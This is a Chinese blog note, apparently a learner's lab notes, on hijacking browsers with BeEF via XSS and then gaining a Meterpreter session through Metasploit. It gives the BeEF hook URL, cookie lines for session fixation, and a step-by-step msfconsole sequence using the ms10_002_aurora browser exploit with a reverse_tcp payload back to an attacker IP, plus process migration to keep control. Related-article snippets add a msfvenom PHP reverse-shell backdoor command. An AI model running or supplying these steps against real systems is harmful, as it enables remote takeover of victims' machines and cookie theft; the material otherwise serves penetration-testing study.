利用beef和msf实现session远程命令

最新推荐文章于 2025-03-13 00:00:00 发布
最新推荐文章于 2025-03-13 00:00:00 发布
阅读量690 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 杂记 文章标签: 1024程序员节
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.youkuaiyun.com/weixin_46439278/article/details/109256050
本文介绍了如何启动BeEF(Browser Exploitation Framework)进行XSS攻击,包括修改配置文件、启动命令及Web管理界面的访问地址。同时,也展示了Metasploit Framework(MSF)的使用步骤,如启动msfconsole,选择exploit模块,设置payload,配置攻击者IP,并实现浏览器劫持和会话固定。通过这些步骤,可以理解XSS攻击的实施过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

笔记

beef

工具目录 /usr/share/beef-xss
配置文件 config.yaml

启动 beef 的方法

1.beef-xss
2./usr/share/beef-xss/beef
(使用前需要修改默认的用户名称和密码)
Web 管理界面 http://127.0.0.1:3000/ui/panel
Shellcode http://127.0.0.1:3000/hook.js
测试页面 http://127.0.0.1:3000/demos/butcher/index.html
#xss 利用 1.浏览器劫持
2.Cookie 窃取与欺骗–固定会话攻击
data:cookie=“username=admin”; userid=1

document.cookie=“username=admin”;
document.cookie=“userid=1”;

msf

1.—启动 msfcosole
2.—用模块 use exploit/windows/browser/ms10_002_aurora
3.—set payload windows/meterpreter/reverse_tcp
4.—set SRVHOST 192.168.36.128(攻击者)
5.—show options
6.—set LHOST 192.168.36.128(攻击者)
7.—启动模块 exploit 得到一个 URL,让浏览器重定向到改 URL
8.—至此建立一个 session
sessions -i 查看会话
seessions -i 1 切换会话
ps 查看当前会话
getpid 查看当前 pid
getuid 查看当前 uid
migrate 1420 切换进程到 1420(切换进程是为了使得被攻击者不会因为关闭浏览器而下线)

hackthebox(HTB) Ambassdor !
qq_58869808的博客
12-08 1万+
hackthebox(HTB) Ambassdor !
kali beef + msf整合 可用配置
x631617479的博客
12-30 901
配置beef开启msf vim /usr/share/beef-xss/config,yaml 开启msf配置 vim /usr/share/beef-xss/extensions/metasploit/config.yaml 启动beef 一定要先到beef路径 使用./ 启动 cd /usr/share/beef-xss/ ./beef 判断是否成功 ...
beef + msf 实现内网渗透
weixin_30416497的博客
04-10 614
在内网渗透方面,最为大众所知道的就是xp系统的ms08067漏洞,通过这个漏洞可以对未打上补丁的xp系统实现getshell, 但是经过笔者发现,这种漏洞攻击在被攻击机开上windows防火墙的时候是没用的(连ping都会被拒绝),但是arp+dns欺骗仍然是可行的 那么问题来了,我们如何通过内网欺骗来getshell? 在被攻击机开启防火墙的时候,可以看到使用ms08067漏洞未...
BeEF+msf对用户浏览器的攻击测试
liveJQ
02-08 2543
什么是BeEFBeEF是The Browser Exploitation Framework的缩写,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击利用。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强...
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R &gt; test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
msf获取session
weixin_50683638的博客
04-28 537
进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 idletime 最近运行的时间 route 查看目录完整网络 getuid 当前用户名 run post/windows/manage/kil
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
网络安全之路:我的系统性渗透测试学习框架
03-19 2143
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
web渗透常见漏洞总结
gugonggugong的博客
01-14 3736
一、SQL注入 1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击;如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。 2. 不同数据库的注入 MySQL access...
MSFsessions命令使用
qq_44624916的博客
11-28 6928
MSF使用
msf 获取一个普通的session 控制windows
weixin_44286136的博客
05-19 2865
msf 获取session 在kali终端中打开msfconsole控制台 开启监听 use exploit/multi/handler 设置tcp监听 set payload windows/meterpreter/reverse_tcp 再次开启一个终端进行(shift+ctrl+T),查看本机ip 利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序
msf~~~
Augmentum-Casper的专栏
11-09 788
如果有人问我msf天书有什么区别么~~我会非常肯定的告诉他"NO"~~~~
msf 获取session 之后
weixin_30460489的博客
12-10 1809
进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 ...
ettercap+beef+metesploit 实现远控
weixin_44270509的博客
10-31 455
第一步:: 用ettercap实现dns欺骗(局域网,嘤嘤嘤) 1.先修改配置文件 geditor /etc/ettercap/etter.dns 2.加入 被访问的网址 A 自己创建好的网址 被访问的网址 PTR 自己创建好的网址 3.开始 刚开始还是嗅探那套流程,找ip啥的 然后把.1(路由器)放进target1 目标机器放进target2 然后双击 最后 开始欺骗 **(...
msf学习笔记
qq_48257021的博客
12-20 1354
SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据,MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445,MS05-039、MS09-026、-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。-t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20。
msf(Metasploit)中Session与Channel的区别与关系解析
最新发布
vortex5的博客
03-13 952
Session:表示渗透测试人员与目标系统的持续交互连接。它是高层的抽象,提供了一个稳定的环境来执行各种攻击操作。Channel:表示在会话内部的一个具体通信路径,每个Session可以包含多个Channel,用于处理不同类型的数据传输或命令执行。理解SessionChannel的区别,并掌握它们的管理技巧,将大大提高渗透测试的效率。通过会话,渗透测试人员可以与目标系统进行全面交互,而通过通道,攻击者能够高效、灵活地执行命令、传输文件执行后渗透操作。
Metasploit Framework(MSF)的使用
热门推荐
谢公子的博客
03-01 2万+
目录 Metasploit Metasploit的安装升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) Auxiliary辅助探测模块 Exploit漏洞利用模块 Payload攻击载荷模块 后渗透阶段 Post后渗透模块 查看主机是否运行在虚拟机上 关闭杀毒...
【网络安全】 MSF提权
一直被模仿,从未被超越
03-15 1343
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
利用Beef获取目标主机用户名与密码:实战教程
- 配置beef,首先在MSF(Metasploit Framework)控制台上关联beef,通过编辑`config.yaml`文件,启用所需的模块,并指定回调服务器地址为Kali主机的IP地址(192.168.1.2)。 2. **利用beef获取shell**: - 启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值